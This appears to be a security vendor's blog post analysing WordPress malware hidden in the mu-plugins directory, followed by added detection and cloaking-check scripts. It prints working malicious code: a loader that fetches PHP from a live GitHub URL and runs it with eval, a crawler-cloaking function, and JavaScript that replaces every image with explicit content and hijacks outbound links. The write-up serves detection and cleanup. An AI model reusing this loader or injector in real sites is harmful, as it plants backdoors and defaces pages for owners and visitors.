Hidden Malware Strikes Again: Mu-Plugins Under Attack
=====================================================

[Puja Srivastava](https://blog.sucuri.net/author/puja-srivastava), March 28, 2025

At Sucuri, our security researchers continually monitor for new malware variants and infection techniques targeting WordPress websites. Recently, we have uncovered multiple cases where threat actors use the **mu-plugins** directory to hide malicious code. This is a concerning trend: mu-plugins (Must-Use plugins) are loaded automatically on every request, are not listed alongside regular plugins in the WordPress dashboard (they appear only under a separate "Must-Use" tab) and cannot be deactivated from it, so they are easy to overlook during routine security checks.

What Was Discovered
-------------------

Three different malware samples turned up in the mu-plugins directory, each compromising the site in a different way:

1. **Fake update redirect malware:** Detected in `wp-content/mu-plugins/redirect.php`, this malware redirected site visitors to an external malicious website.
2. **Webshell:** Found in `wp-content/mu-plugins/index.php`, it lets attackers execute arbitrary code, giving them near-complete control over the site.
3. **Spam injector:** A spam injection script located in `wp-content/mu-plugins/custom-js-loader.php`. It was being used to inject unwanted spam content into the infected website, presumably to boost SEO rankings for the attackers or to promote scams.

This builds on our previous findings, covered in our blog post on [hidden backdoors](https://blog.sucuri.net/2025/02/hidden-backdoors-uncovered-in-wordpress-malware-investigation.html), where similar issues were observed.

### Indicators of Compromise (IoCs)

The presence of this malware can usually be identified by a few obvious signs.
One prominent indicator is unusual behavior on the site, such as unauthorized redirection of visitors to external malicious websites. Suspicious files with uncommon or misleading names also appear inside the **mu-plugins** directory, often mimicking legitimate plugins. Administrators may notice elevated server resource usage with no clear explanation, along with unexpected file modifications or unauthorized code in critical directories.

Scope of the Malware
--------------------

The number of infections we have seen inside mu-plugins suggests that attackers are actively targeting this directory as a persistent foothold. WordPress loads every PHP file in the top level of the mu-plugins directory automatically, without any activation step in the dashboard, which makes it an ideal hiding place for malware.

These infections allow attackers to:

* Redirect traffic to malicious websites.
* Maintain persistent access via backdoors.
* Inject spam content to manipulate SEO rankings.

Analysis of the Malware: How and What It Did
--------------------------------------------

### Case 1: Fake Update Redirection Malware

The first sample we examined was disguised as a legitimate WordPress function inside **redirect.php**. The script executes conditionally depending on who the visitor is: a bot, an administrator, or a regular visitor.

Fake update malware on WordPress sites tricks users into running malicious code by disguising it as a legitimate browser or system update. Once executed, it can install backdoors, steal data, or drop additional malware, compromising the visitor as well as the site's reputation.

The script includes a function that identifies whether the current visitor is a bot. This lets the script exclude search engine crawlers so that the redirection behavior is never seen, indexed or flagged by them:

```php
function is_bot() {
    $bot_agents = [
        'bot', 'crawl', 'spider', 'Googlebot', 'bingbot', 'Baiduspider', 'YandexBot',
        'DuckDuckBot', 'Yahoo! Slurp', 'facebot', 'ia_archiver', 'AhrefsBot', 'SemrushBot',
        'MJ12bot', 'DotBot', 'Sogou', 'Exabot', 'FacebookExternalHit'
    ];
    // The User-Agent is lowercased but most list entries are mixed case, so those entries
    // can never match; named crawlers are caught only through the generic 'bot', 'crawl'
    // and 'spider' substrings. Any client that sends a custom User-Agent bypasses the check.
    $user_agent = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');
    foreach ($bot_agents as $bot) {
        if (strpos($user_agent, $bot) !== false) {
            return true; // User is a bot
        }
    }
    return false; // User is not a bot
}
```

The most concerning part of the script is the redirection to **updatesnow[.]net**. Bots and privileged users (logged-in administrators) are skipped, so neither search engines nor the site owner ever see the redirect, which is exactly why a cloaked infection can persist for a long time.

### Case 2: Remote Code Execution Webshell

A [webshell](https://blog.sucuri.net/2024/04/web-shells.html) is a malicious script that attackers upload to a compromised website to gain remote control over the server. It acts as a backdoor, allowing them to execute commands, upload files, steal data, or launch further attacks. Webshells are often disguised as normal files and hidden among legitimate website directories, making them hard to detect.

The second case is a more sophisticated attack disguised as a legitimate WordPress plugin. The malicious file (**wp-content/mu-plugins/index.php**) downloads a remote PHP script and executes it:

```php
$externalResource = 'https://raw.githubusercontent.com/starkvps99812/upd/refs/heads/main/BypassBest.php';
$connectionHandle = curl_init($externalResource);
curl_setopt($connectionHandle, CURLOPT_RETURNTRANSFER, true);
$retrievedCode = curl_exec($connectionHandle);
if (curl_errno($connectionHandle)) {
    die('cURL error occurred: ' . curl_error($connectionHandle));
}
curl_close($connectionHandle);
// The '?>' prefix leaves PHP mode first, so the fetched file can start with its own '<?php' tag.
eval('?>' . $retrievedCode);
```

Because mu-plugins run on every request, each page load fetches and executes whatever is currently hosted at that URL. The attacker can therefore push new malware to the site without touching the file on disk: the loader never changes after it is dropped, so a file-integrity monitor alerts only at the moment it is written, not on each payload change. There is no legitimate reason for a plugin to evaluate PHP fetched over the network, so this pattern alone is enough to classify the file as malicious.

Case 3: Spam Content and Link Hijacking Injector
------------------------------------------------

The third variant uses JavaScript injection.
At the beginning, the script enables full error reporting and WordPress debugging:

```php
error_reporting(E_ALL);
ini_set('display_errors', 1);
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);
define('WP_DEBUG_DISPLAY', true);
```

It then targets the mu-plugins folder, creating it if it does not exist. Note the hard-coded absolute path, which ties this sample to one specific hosting account:

```php
$mu_plugins_dir = '/home/h34vwyurk8sp/public_html/wp-content/mu-plugins/';
$plugin_file = $mu_plugins_dir . 'custom-js-loader.php';
if (!is_dir($mu_plugins_dir)) {
    mkdir($mu_plugins_dir, 0755, true);
}
```

The script writes a custom JavaScript injector that replaces images and manipulates links. It replaces every image on the site with explicit content, which can seriously harm the website's reputation:

```javascript
document.addEventListener('DOMContentLoaded', function () {
    let newUrl = 'https://imagex1[.]sx[.]cdn[.]live/images/pinporn/2022/02/23/26777510.gif?width=620';
    document.querySelectorAll('img').forEach(link => {
        link.src = newUrl;
        link.srcset = newUrl;
    });
});
```

Another malicious section intercepts link clicks. Every click is cancelled with `preventDefault()`; links to the site's own hostname are then navigated manually so the site keeps working, while every outbound link opens a popup with the attacker's content instead of taking the visitor to the intended destination:

```javascript
document.addEventListener('DOMContentLoaded', function () {
    document.querySelectorAll('a').forEach(link => {
        link.addEventListener('click', function (event) {
            event.preventDefault();
            let url = this.href;
            let popupUrl = 'https://imagex1[.]sx[.]cdn[.]live/images/pinporn/2023/01/26/28785006.gif?width=620';
            if (!url.includes(window.location.hostname)) {
                window.open(popupUrl, 'PopupWindow', 'width=800,height=600,resizable=yes,scrollbars=yes');
            } else {
                window.location.href = url;
            }
        });
    });
});
```

[Screenshot from the original post, not reproduced here: the infected site with every image replaced by the explicit GIF.]

Motive Behind the Attack and Impact of the Malware
--------------------------------------------------

The ultimate goal behind these infections appears to be a mix of monetization and persistence.
Each of these techniques benefits the attacker financially while keeping the payload hidden.

The redirect malware exposes visitors to potentially harmful content, which can lead to malware downloads on their devices, damage to the website's reputation, and a drop in traffic. The webshell poses a much greater threat: it can lead to complete website takeover, data theft, malware distribution, defacement, SEO spam, and a persistent backdoor for future attacks. The spam injector in the third case severely damages the site's reputation by replacing all images with sexually explicit content and hijacking every external link, most likely toward malicious or scam websites. The potential impact ranges from minor inconvenience to a severe security breach, which is why proactive website security measures matter.

How Could the Site Have Been Infected?
--------------------------------------

There are several ways this malware could have entered the affected WordPress sites:

* **Exploiting vulnerable plugins or themes:** If a site runs outdated software, attackers can exploit known vulnerabilities to upload malicious files.
* **Compromised admin credentials:** With access to an administrator account, an attacker can place malware inside mu-plugins, for instance by uploading a plugin that writes the file.
* **Abuse of poorly secured hosting environments:** Weak file permissions or outdated server configurations can let an attacker modify WordPress core and `wp-content` files, including mu-plugins.

Once a file is in the mu-plugins directory, WordPress loads it on every request, so the malware needs no activation, cannot be deactivated from the dashboard, and is easy to miss in a routine plugin audit.

Prevention and Mitigation
-------------------------

If you suspect your site is infected, take immediate action:

* Scan your WordPress installation for malicious files, paying particular attention to the mu-plugins directory (`wp-content/mu-plugins/`, or the path set in `WPMU_PLUGIN_DIR`).
* Check for unauthorized administrator accounts and remove any that look suspicious.
* Audit your installed plugins and delete any you do not recognize.
* Update WordPress, plugins, and themes to the latest versions to prevent reinfection.
* Change all admin passwords and enable two-factor authentication (2FA).
* Monitor file integrity with a security plugin or a server-side tool that alerts you to unexpected changes.

Conclusion
----------

The repeated abuse of the **mu-plugins** directory shows how creatively and persistently attackers hide malware deep within WordPress installations. Regular security monitoring, file integrity checks, and a web application firewall (WAF) are essential to keep such infections at bay.

If you are unsure whether your site has been compromised, Sucuri's [website security platform](https://sucuri.net/website-security-platform/) can help detect and remove hidden threats before they cause damage.
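The scan and file-integrity steps in the Prevention list, and the "suspicious files in mu-plugins" and "unexpected file modifications" indicators from the IoC section, can be automated in a few dozen lines. The script below is an added example written for this page; it is not code from the original post or from Sucuri. It combines a SHA-256 baseline of `wp-content/mu-plugins/` with a static triage of each file for the constructs the three samples relied on (a network fetch feeding `eval`, `HTTP_USER_AGENT` cloaking next to a `Location` redirect, `WP_DEBUG` toggles, `querySelectorAll('img'|'a')` rewriting, and code that writes into mu-plugins). The sample files it audits are constructed stand-ins modelled on the samples above, not the real malware, and the GitHub URL in the constructed loader is a placeholder.

```python
#!/usr/bin/env python3
"""Audit a WordPress mu-plugins directory: baseline diff plus static triage.

1. File integrity: every file's SHA-256 is compared with a saved baseline, so new,
   modified or deleted files are reported even when their content looks harmless.
2. Static triage: source is scanned for the constructs the three samples relied on,
   so a freshly dropped loader is caught even on a site that has no baseline yet.
"""
import hashlib
import os
import re
import tempfile

# (name, regex) pairs drawn from the three samples; any hit marks the file for review.
SUSPICIOUS_PATTERNS = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("remote_fetch", re.compile(r"\b(curl_init|curl_exec|file_get_contents)\s*\(")),
    ("remote_url", re.compile(r"https?://", re.I)),
    ("redirect", re.compile(r"header\s*\(\s*['\"]Location:|\bwp_redirect\s*\(")),
    ("ua_cloaking", re.compile(r"HTTP_USER_AGENT")),
    ("debug_toggle", re.compile(r"\bdefine\s*\(\s*['\"]WP_DEBUG")),
    ("dom_injection", re.compile(r"querySelectorAll\s*\(\s*['\"](img|a)['\"]")),
    ("mu_writer", re.compile(r"mu-plugins.*?\b(mkdir|file_put_contents|fwrite)\s*\(", re.S)),
]


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(mu_dir):
    """Relative path -> SHA-256 for every file below mu_dir (save this while the site is clean)."""
    manifest = {}
    for root, _dirs, files in os.walk(mu_dir):
        for name in files:
            full = os.path.join(root, name)
            manifest[os.path.relpath(full, mu_dir)] = sha256_file(full)
    return manifest


def triage_source(src):
    """Names of the suspicious patterns present in one source string."""
    hits = [name for name, rx in SUSPICIOUS_PATTERNS if rx.search(src)]
    if "eval" in hits and "remote_fetch" in hits:  # the Case 2 shape: fetch, then eval
        hits.append("remote_code_loader")
    return hits


def audit(mu_dir, baseline=None):
    """Return {relative path: {"status": new|modified|unchanged|missing, "hits": [...]}}."""
    baseline = baseline or {}
    current = build_manifest(mu_dir)
    report = {}
    for rel, digest in current.items():
        status = "new" if rel not in baseline else ("modified" if baseline[rel] != digest else "unchanged")
        with open(os.path.join(mu_dir, rel), encoding="utf-8", errors="replace") as f:
            hits = triage_source(f.read())
        report[rel] = {"status": status, "hits": hits}
    for rel in baseline:
        if rel not in current:
            report[rel] = {"status": "missing", "hits": []}
    return report


def suspicious_files(report):
    """Sorted paths that changed since the baseline or matched a pattern."""
    return sorted(rel for rel, r in report.items() if r["status"] != "unchanged" or r["hits"])


# Constructed sample files: one typical legitimate mu-plugin and three cut-down stand-ins
# for the samples in the post (the loader URL below is a placeholder, not the real one).
SAMPLE_BENIGN = "<?php\n// Disable XML-RPC, a common brute-force vector.\nadd_filter('xmlrpc_enabled', '__return_false');\n"
SAMPLE_REDIRECT = """<?php
function is_bot() { return strpos(strtolower($_SERVER['HTTP_USER_AGENT'] ?? ''), 'bot') !== false; }
if (!is_bot() && !current_user_can('administrator')) { header('Location: https://updatesnow[.]net/'); exit; }
"""
SAMPLE_LOADER = """<?php
$h = curl_init('https://raw.githubusercontent.com/example-attacker/upd/main/payload.php');
curl_setopt($h, CURLOPT_RETURNTRANSFER, true);
$code = curl_exec($h); curl_close($h);
eval('?>' . $code);
"""
SAMPLE_INJECTOR = """<?php
define('WP_DEBUG', true);
add_action('wp_footer', function () {
    echo "<script>document.querySelectorAll('img').forEach(i => i.src = 'https://imagex1[.]sx[.]cdn[.]live/x.gif');</script>";
});
"""


def demo():
    """Create a throwaway mu-plugins directory, baseline it while clean, drop the three
    malicious stand-ins, and audit it. Returns the report."""
    mu_dir = tempfile.mkdtemp(prefix="mu-plugins-")
    with open(os.path.join(mu_dir, "disable-xmlrpc.php"), "w") as f:
        f.write(SAMPLE_BENIGN)
    baseline = build_manifest(mu_dir)  # snapshot taken on the clean site
    for name, src in (("redirect.php", SAMPLE_REDIRECT), ("index.php", SAMPLE_LOADER),
                      ("custom-js-loader.php", SAMPLE_INJECTOR)):
        with open(os.path.join(mu_dir, name), "w") as f:
            f.write(src)
    return audit(mu_dir, baseline)


if __name__ == "__main__":
    report = demo()
    for rel in suspicious_files(report):
        print(f"{rel}: {report[rel]['status']}  hits={','.join(report[rel]['hits']) or '-'}")
```

In production, run `build_manifest()` on a known-clean site and store the result off-server (an attacker who can write to mu-plugins can also edit a manifest kept next to it), then run `audit()` from cron and alert on anything `suspicious_files()` returns. The patterns are deliberately broad: a legitimate mu-plugin that contains an `https://` string will show up with a single `remote_url` hit and an `unchanged` status, which is quick to dismiss, whereas the Case 2 loader is named explicitly as `remote_code_loader`.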
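The cloaking in Case 1 (crawlers and administrators skipped, everyone else redirected) can also be confirmed from the outside, without reading the PHP: request the same URL as a crawler, as a plain browser and, optionally, with an administrator's session cookie, refuse to follow redirects, and compare the answers. A clean site answers every persona alike. The script below is an added example written for this page, not part of the original post; the persona User-Agent strings and the cookie handling are assumptions for illustration, and `SAMPLE_RESPONSES` is a constructed model of the Case 1 behaviour with the redirect domain defanged.

```python
#!/usr/bin/env python3
"""Spot User-Agent / login cloaking of the kind used by the Case 1 redirect malware.

The same URL is requested under several personas with redirects disabled and the
answers are compared. A redirect, or an external script, that only an ordinary visitor
receives while the crawler gets the clean page is the signature of cloaked malware.
"""
import re
import sys
import urllib.error
import urllib.request

# Personas (constructed). The crawler string contains 'bot', so an is_bot()-style
# substring check matches it even though that check lowercases the header first.
PERSONAS = {
    "googlebot": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "browser": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/124.0 Safari/537.36",
}

SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc=[\"']([^\"']+)", re.I)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following 3xx so the Location header can be inspected."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = urllib.request.build_opener(_NoRedirect)


def fetch(url, user_agent, cookie=None):
    """One request as the given persona; returns (status, location, body)."""
    headers = {"User-Agent": user_agent}
    if cookie:
        headers["Cookie"] = cookie
    req = urllib.request.Request(url, headers=headers)
    try:
        with _OPENER.open(req, timeout=15) as resp:
            return resp.status, resp.headers.get("Location"), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:  # 3xx (redirects disabled), 4xx and 5xx arrive here
        return e.code, e.headers.get("Location"), e.read().decode("utf-8", "replace")


def script_sources(body):
    """External script URLs referenced by an HTML body."""
    return set(SCRIPT_SRC.findall(body))


def compare(responses, reference="googlebot"):
    """responses: persona -> (status, location, body).

    Each persona is compared with the reference (the crawler, which cloaked malware
    always serves the clean page). Returns human-readable findings; an empty list means
    every persona was answered identically.
    """
    findings = []
    ref_status, ref_loc, ref_body = responses[reference]
    ref_scripts = script_sources(ref_body)
    for persona, (status, loc, body) in responses.items():
        if persona == reference:
            continue
        if (status, loc) != (ref_status, ref_loc):
            findings.append(f"{persona}: status {status} location {loc!r}, "
                            f"while {reference} got status {ref_status} location {ref_loc!r}")
        extra = script_sources(body) - ref_scripts
        if extra:
            findings.append(f"{persona}: extra scripts not served to {reference}: {sorted(extra)}")
    return findings


def check_url(url, admin_cookie=None):
    """Fetch url as every persona and compare. The admin persona needs a real
    wordpress_logged_in_* cookie copied from a genuine session; it cannot be forged."""
    responses = {name: fetch(url, ua) for name, ua in PERSONAS.items()}
    if admin_cookie:
        responses["admin"] = fetch(url, PERSONAS["browser"], admin_cookie)
    return compare(responses)


# Constructed responses modelling Case 1: crawler and admin get the page, the ordinary
# visitor is bounced to the fake-update domain (defanged).
CLEAN_PAGE = "<html><head><script src='/wp-includes/js/jquery/jquery.min.js'></script></head><body>Welcome</body></html>"
SAMPLE_RESPONSES = {
    "googlebot": (200, None, CLEAN_PAGE),
    "browser": (302, "https://updatesnow[.]net/", ""),
    "admin": (200, None, CLEAN_PAGE),
}

if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: cloak_check.py https://example.com/ [admin-cookie]
        findings = check_url(sys.argv[1], admin_cookie=(sys.argv[2] if len(sys.argv) > 2 else None))
    else:
        findings = compare(SAMPLE_RESPONSES)
    print("\n".join(findings) or "no cloaking detected")
```

Run it against the site's front page and a few deep pages, since some variants only fire on certain paths or on the first visit. A difference in `Location` is the strongest signal; the script-source diff catches the related case where a cloaked injector adds an external `<script>` only for visitors. It will not flag the Case 3 injector, which serves its JavaScript to everyone, so pair it with a file-level scan of mu-plugins.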
Associated Indicators
---------------------

* `wp-content/mu-plugins/redirect.php`, `wp-content/mu-plugins/index.php`, `wp-content/mu-plugins/custom-js-loader.php`: file names used by the three samples
* `updatesnow[.]net`: redirect destination of the fake update malware (Case 1)
* `https://raw.githubusercontent.com/starkvps99812/upd/refs/heads/main/BypassBest.php`: remote payload fetched and evaluated by the loader (Case 2)
* `imagex1[.]sx[.]cdn[.]live`: host of the explicit images and popup content (Case 3)
* `https://imagex1[.]sx[.]cdn[.]live/images/pinporn/2022/02/23/26777510.gif?width=620`: image replacement URL (Case 3)
* `https://imagex1[.]sx[.]cdn[.]live/images/pinporn/2023/01/26/28785006.gif?width=620`: popup URL opened on outbound link clicks (Case 3)


